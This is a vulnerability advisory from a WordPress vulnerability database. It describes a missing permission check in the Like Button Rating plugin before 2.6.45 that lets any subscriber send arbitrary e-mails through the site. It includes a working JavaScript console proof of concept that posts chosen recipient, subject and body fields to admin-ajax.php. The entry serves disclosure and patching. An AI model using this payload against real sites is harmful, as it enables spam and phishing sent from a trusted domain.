wpvulndb | Krzysztof Zając | WPVDB-ID: 180F8E87-1463-43BB-A901-80031127723A
History: May 23, 2022 - 12:00 a.m.

Like Button Rating < 2.6.45 - Arbitrary e-mail Sending

Source: wpscan.com
Tags: plugin vulnerability, arbitrary email sending, web developer console

EPSS: 0.001 (percentile 24.8%)

The plugin's likebtn_test_vote_notification AJAX action, reachable through wp-admin/admin-ajax.php (which every authenticated user can call), does not check that the caller is allowed to use it. Any logged-in user, down to a subscriber, can therefore make the site send an e-mail to any recipient with an attacker-chosen subject and body, using the site's own mail configuration. Affected: Like Button Rating versions before 2.6.45.

PoC

As a subscriber, while logged in to the target site, run the following in the browser's web developer console. The URL is relative, so the request goes to the site whose page is open, and "credentials: include" attaches the session cookie. The three options[...] parameters are the recipient, subject and body of the mail; the recipient value is the placeholder that survived e-mail obfuscation on the original page, so substitute an address you control:

```javascript
fetch("/wp-admin/admin-ajax.php?action=likebtn_test_vote_notification", {
  method: "POST",
  credentials: "include",
  headers: { "content-type": "application/x-www-form-urlencoded" },
  body:
    "options[likebtn_notify_to]=[email protected]" +
    "&options[likebtn_notify_subject]=hehehe" +
    "&options[likebtn_notify_text]=Hopsasa",
})
  .then((response) => response.text())
  .then((data) => console.log(data));
```

A successful run delivers the mail to the chosen recipient; the console output is only whatever the handler prints back.

